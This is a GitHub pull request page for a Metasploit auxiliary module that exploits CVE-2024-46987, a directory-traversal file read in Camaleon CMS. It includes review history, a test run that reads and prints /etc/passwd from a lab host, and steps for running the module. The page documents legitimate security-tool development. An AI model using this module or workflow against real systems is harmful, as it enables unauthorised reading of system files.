Camaleon CMS CVE 2024 46987#21122
Merged
jheysel-r7 merged 14 commits intorapid7:masterfrom Apr 17, 2026
Merged
Conversation
Adds missing options to documentation Makes verbose option not required Changes VHOST option type - some reason "address" type domain names were marked as "invalid"
Updates documentation
Contributor
There was a problem hiding this comment.
Pull request overview
Adds a new Metasploit auxiliary gather module and documentation to exploit Camaleon CMS CVE-2024-46987 for authenticated arbitrary file read via directory traversal.
Changes:
- Introduces
auxiliary/gather/camaleon_traversalmodule implementing authentication, version checking, and file retrieval. - Adds user-facing documentation with verification steps, options, and an example run.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 10 comments.
| File | Description |
|---|---|
| modules/auxiliary/gather/camaleon_traversal.rb | New auxiliary module to authenticate to Camaleon CMS and attempt traversal-based file reads. |
| documentation/modules/auxiliary/gather/camaleon_traversal.md | New module documentation describing affected versions, usage, options, and example output. |
adfoster-r7
reviewed
Mar 26, 2026
adfoster-r7
reviewed
Mar 26, 2026
adfoster-r7
reviewed
Mar 26, 2026
adfoster-r7
previously requested changes
Mar 26, 2026
github-project-automation
Bot
moved this from Todo
to Waiting on Contributor
in Metasploit Kanban
Removes unnecessary options Removes credentials from logs Refactors check method Makes use of Rex::Version Removes get_base_url in favor of relative filepaths in send_request_cgi Other small changes
jheysel-r7
added
module
docs
rn-modules
jheysel-r7
reviewed
Apr 14, 2026
jheysel-r7
reviewed
Apr 15, 2026
Contributor
jheysel-r7
left a comment
jheysel-r7
left a comment
There was a problem hiding this comment.
Thank you @bootstrapbool. Just a couple comments.
Testing
msf auxiliary(gather/camaleon_traversal) > run
[*] Running module against 172.16.199.136
[+] /etc/passwd stored as '/Users/jheysel/.msf4/loot/20260415100322_default_172.16.199.136_camaleon.travers_869551.txt'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
whoopsie:x:117:124::/nonexistent:/bin/false
sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
msfuser:x:1000:1000:msfuser,,,:/home/msfuser:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
postgres:x:129:136:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Places rails version check after downgrading concurrent-ruby
jheysel-r7
approved these changes
Apr 17, 2026
github-project-automation
Bot
moved this from Waiting on Contributor
to Done
in Metasploit Kanban
Contributor
Release NotesThis adds an auxiliary module to exploit an arbitrary file vulnerability, CVE-2024-46987, on Camaleon CMS >= 2.8.0 as well as 2.9.0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This change adds a module to exploit CVE-2024-46987 resulting in reading arbitrary files on Camaleon CMS >= 2.8.0 as well as 2.9.0
Verification
List the steps needed to make sure this thing works
msfconsoleuse auxiliary/gather/camaleon_traversalset rhost {target host}set rport {target port}run*pcap sent to msfdev@metasploit.com